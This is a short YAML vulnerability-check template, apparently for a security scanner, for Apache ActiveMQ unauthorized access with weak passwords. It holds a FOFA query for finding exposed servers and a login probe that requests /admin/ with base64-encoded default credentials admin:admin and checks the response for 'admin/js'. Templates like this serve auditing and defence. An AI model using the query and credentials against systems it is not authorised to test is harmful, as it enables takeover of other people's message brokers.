product: Apache ActiveMQ
vName: Apache ActiveMQ 未授权访问&弱口令
type: 访问控制
vID: [ ]
level: 3
vDesc: 默认情况下，ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄露
version: ''
note: ''
search:
  FOFA: app="APACHE-ActiveMQ"
protocol: http
link: https://baiker.top/209eabddaf61
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /admin/
      header:
        Authorization: Basic YWRtaW46YWRtaW4=
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - admin/js
            logic: and